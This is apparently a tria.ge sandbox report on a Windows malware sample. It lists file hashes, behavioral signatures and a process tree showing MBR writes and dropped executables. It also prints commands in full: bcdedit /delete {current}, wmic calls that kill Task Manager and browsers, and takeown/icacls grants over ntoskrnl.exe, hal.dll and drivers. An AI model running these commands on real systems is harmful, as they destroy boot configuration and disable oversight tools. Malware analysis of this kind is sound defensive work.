Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
99s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
10/06/2023, 10:08
Static task
static1
Behavioral task
behavioral1
Sample
07443099.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
07443099.exe
Resource
win10v2004-20230220-en
General
-
Target
07443099.exe
-
Size
247KB
-
MD5
733eb0ab951ae42a8d8cca413201e428
-
SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
-
SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
-
SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
SSDEEP
3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Possible privilege escalation attempt 25 IoCs
pid Process 1316 icacls.exe 1072 icacls.exe 1084 icacls.exe 1488 takeown.exe 1192 takeown.exe 1880 icacls.exe 1924 icacls.exe 1732 icacls.exe 1908 takeown.exe 1172 takeown.exe 1068 icacls.exe 928 icacls.exe 1208 icacls.exe 1256 icacls.exe 1124 takeown.exe 792 takeown.exe 1424 takeown.exe 1792 takeown.exe 1156 icacls.exe 860 icacls.exe 900 takeown.exe 844 takeown.exe 1916 takeown.exe 1044 takeown.exe 1852 takeown.exe -
Executes dropped EXE 2 IoCs
pid Process 1868 winconfig.exe 620 DetectKey.exe -
Loads dropped DLL 1 IoCs
pid Process 1764 07443099.exe -
Modifies file permissions 1 TTPs 25 IoCs
pid Process 1316 icacls.exe 1192 takeown.exe 1880 icacls.exe 1924 icacls.exe 900 takeown.exe 1852 takeown.exe 1156 icacls.exe 1208 icacls.exe 1256 icacls.exe 1916 takeown.exe 1044 takeown.exe 844 takeown.exe 1068 icacls.exe 860 icacls.exe 1084 icacls.exe 1732 icacls.exe 1124 takeown.exe 1172 takeown.exe 792 takeown.exe 1792 takeown.exe 928 icacls.exe 1072 icacls.exe 1908 takeown.exe 1488 takeown.exe 1424 takeown.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 1488 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 07443099.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 620 DetectKey.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1172 WMIC.exe Token: SeSecurityPrivilege 1172 WMIC.exe Token: SeTakeOwnershipPrivilege 1172 WMIC.exe Token: SeLoadDriverPrivilege 1172 WMIC.exe Token: SeSystemProfilePrivilege 1172 WMIC.exe Token: SeSystemtimePrivilege 1172 WMIC.exe Token: SeProfSingleProcessPrivilege 1172 WMIC.exe Token: SeIncBasePriorityPrivilege 1172 WMIC.exe Token: SeCreatePagefilePrivilege 1172 WMIC.exe Token: SeBackupPrivilege 1172 WMIC.exe Token: SeRestorePrivilege 1172 WMIC.exe Token: SeShutdownPrivilege 1172 WMIC.exe Token: SeDebugPrivilege 1172 WMIC.exe Token: SeSystemEnvironmentPrivilege 1172 WMIC.exe Token: SeRemoteShutdownPrivilege 1172 WMIC.exe Token: SeUndockPrivilege 1172 WMIC.exe Token: SeManageVolumePrivilege 1172 WMIC.exe Token: 33 1172 WMIC.exe Token: 34 1172 WMIC.exe Token: 35 1172 WMIC.exe Token: SeIncreaseQuotaPrivilege 1172 WMIC.exe Token: SeSecurityPrivilege 1172 WMIC.exe Token: SeTakeOwnershipPrivilege 1172 WMIC.exe Token: SeLoadDriverPrivilege 1172 WMIC.exe Token: SeSystemProfilePrivilege 1172 WMIC.exe Token: SeSystemtimePrivilege 1172 WMIC.exe Token: SeProfSingleProcessPrivilege 1172 WMIC.exe Token: SeIncBasePriorityPrivilege 1172 WMIC.exe Token: SeCreatePagefilePrivilege 1172 WMIC.exe Token: SeBackupPrivilege 1172 WMIC.exe Token: SeRestorePrivilege 1172 WMIC.exe Token: SeShutdownPrivilege 1172 WMIC.exe Token: SeDebugPrivilege 1172 WMIC.exe Token: SeSystemEnvironmentPrivilege 1172 WMIC.exe Token: SeRemoteShutdownPrivilege 1172 WMIC.exe Token: SeUndockPrivilege 1172 WMIC.exe Token: SeManageVolumePrivilege 1172 WMIC.exe Token: 33 1172 WMIC.exe Token: 34 1172 WMIC.exe Token: 35 1172 WMIC.exe Token: SeIncreaseQuotaPrivilege 1348 WMIC.exe Token: SeSecurityPrivilege 1348 WMIC.exe Token: SeTakeOwnershipPrivilege 1348 WMIC.exe Token: SeLoadDriverPrivilege 1348 WMIC.exe Token: SeSystemProfilePrivilege 1348 WMIC.exe Token: SeSystemtimePrivilege 1348 WMIC.exe Token: SeProfSingleProcessPrivilege 1348 WMIC.exe Token: SeIncBasePriorityPrivilege 1348 WMIC.exe Token: SeCreatePagefilePrivilege 1348 WMIC.exe Token: SeBackupPrivilege 1348 WMIC.exe Token: SeRestorePrivilege 1348 WMIC.exe Token: SeShutdownPrivilege 1348 WMIC.exe Token: SeDebugPrivilege 1348 WMIC.exe Token: SeSystemEnvironmentPrivilege 1348 WMIC.exe Token: SeRemoteShutdownPrivilege 1348 WMIC.exe Token: SeUndockPrivilege 1348 WMIC.exe Token: SeManageVolumePrivilege 1348 WMIC.exe Token: 33 1348 WMIC.exe Token: 34 1348 WMIC.exe Token: 35 1348 WMIC.exe Token: SeIncreaseQuotaPrivilege 1348 WMIC.exe Token: SeSecurityPrivilege 1348 WMIC.exe Token: SeTakeOwnershipPrivilege 1348 WMIC.exe Token: SeLoadDriverPrivilege 1348 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1764 wrote to memory of 1868 1764 07443099.exe 29 PID 1764 wrote to memory of 1868 1764 07443099.exe 29 PID 1764 wrote to memory of 1868 1764 07443099.exe 29 PID 1764 wrote to memory of 1868 1764 07443099.exe 29 PID 1868 wrote to memory of 520 1868 winconfig.exe 30 PID 1868 wrote to memory of 520 1868 winconfig.exe 30 PID 1868 wrote to memory of 520 1868 winconfig.exe 30 PID 1868 wrote to memory of 520 1868 winconfig.exe 30 PID 520 wrote to memory of 620 520 cmd.exe 32 PID 520 wrote to memory of 620 520 cmd.exe 32 PID 520 wrote to memory of 620 520 cmd.exe 32 PID 520 wrote to memory of 620 520 cmd.exe 32 PID 520 wrote to memory of 1488 520 cmd.exe 33 PID 520 wrote to memory of 1488 520 cmd.exe 33 PID 520 wrote to memory of 1488 520 cmd.exe 33 PID 520 wrote to memory of 1172 520 cmd.exe 35 PID 520 wrote to memory of 1172 520 cmd.exe 35 PID 520 wrote to memory of 1172 520 cmd.exe 35 PID 520 wrote to memory of 1348 520 cmd.exe 37 PID 520 wrote to memory of 1348 520 cmd.exe 37 PID 520 wrote to memory of 1348 520 cmd.exe 37 PID 520 wrote to memory of 900 520 cmd.exe 38 PID 520 wrote to memory of 900 520 cmd.exe 38 PID 520 wrote to memory of 900 520 cmd.exe 38 PID 520 wrote to memory of 1392 520 cmd.exe 39 PID 520 wrote to memory of 1392 520 cmd.exe 39 PID 520 wrote to memory of 1392 520 cmd.exe 39 PID 520 wrote to memory of 1956 520 cmd.exe 40 PID 520 wrote to memory of 1956 520 cmd.exe 40 PID 520 wrote to memory of 1956 520 cmd.exe 40 PID 520 wrote to memory of 1408 520 cmd.exe 41 PID 520 wrote to memory of 1408 520 cmd.exe 41 PID 520 wrote to memory of 1408 520 cmd.exe 41 PID 520 wrote to memory of 1548 520 cmd.exe 42 PID 520 wrote to memory of 1548 520 cmd.exe 42 PID 520 wrote to memory of 1548 520 cmd.exe 42 PID 520 wrote to memory of 740 520 cmd.exe 43 PID 520 wrote to memory of 740 520 cmd.exe 43 PID 520 wrote to memory of 740 520 cmd.exe 43 PID 520 wrote to memory of 1900 520 cmd.exe 44 PID 520 wrote to memory of 1900 520 cmd.exe 44 PID 520 wrote to memory of 1900 520 cmd.exe 44 PID 520 wrote to memory of 1136 520 cmd.exe 45 PID 520 wrote to memory of 1136 520 cmd.exe 45 PID 520 wrote to memory of 1136 520 cmd.exe 45 PID 520 wrote to memory of 928 520 cmd.exe 46 PID 520 wrote to memory of 928 520 cmd.exe 46 PID 520 wrote to memory of 928 520 cmd.exe 46 PID 520 wrote to memory of 328 520 cmd.exe 47 PID 520 wrote to memory of 328 520 cmd.exe 47 PID 520 wrote to memory of 328 520 cmd.exe 47 PID 520 wrote to memory of 2000 520 cmd.exe 48 PID 520 wrote to memory of 2000 520 cmd.exe 48 PID 520 wrote to memory of 2000 520 cmd.exe 48 PID 520 wrote to memory of 1916 520 cmd.exe 49 PID 520 wrote to memory of 1916 520 cmd.exe 49 PID 520 wrote to memory of 1916 520 cmd.exe 49 PID 520 wrote to memory of 524 520 cmd.exe 50 PID 520 wrote to memory of 524 520 cmd.exe 50 PID 520 wrote to memory of 524 520 cmd.exe 50 PID 520 wrote to memory of 1768 520 cmd.exe 51 PID 520 wrote to memory of 1768 520 cmd.exe 51 PID 520 wrote to memory of 1768 520 cmd.exe 51 PID 520 wrote to memory of 844 520 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\07443099.exe"C:\Users\Admin\AppData\Local\Temp\07443099.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\451C.tmp\451D.tmp\451E.bat C:\Windows\Temp\winconfig.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:620
-
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}4⤵
- Modifies boot configuration data using bcdedit
PID:1488
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive4⤵PID:900
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive4⤵PID:1392
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive4⤵PID:1956
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:1408
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive4⤵PID:1548
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive4⤵PID:740
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive4⤵PID:1900
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive4⤵PID:1136
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive4⤵PID:928
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive4⤵PID:328
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:2000
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive4⤵PID:1916
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive4⤵PID:524
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive4⤵PID:1768
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive4⤵PID:844
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive4⤵PID:1516
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive4⤵PID:1632
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive4⤵PID:1080
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive4⤵PID:888
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive4⤵PID:288
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive4⤵PID:1352
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive4⤵PID:1316
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1716
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1304
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1604
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:852
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1124
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1908
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1916
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1488
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1192
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1424
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1172
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:792
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1792
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1044
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:844
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:900
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1852
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1404
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1260
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1332
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:1368
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1880
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1924
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1732
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1208
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1256
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1068
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:928
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:860
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1072
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1084
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:2028
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:1612
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:1908
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1508
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵PID:792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1792
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵PID:612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1952
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵PID:896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1820
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵PID:1852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1572
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵PID:1392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1404
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2012
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵PID:1956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:888
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵PID:1896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1624
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵PID:1616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:856
-
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F4⤵PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:740
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F4⤵PID:1880
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b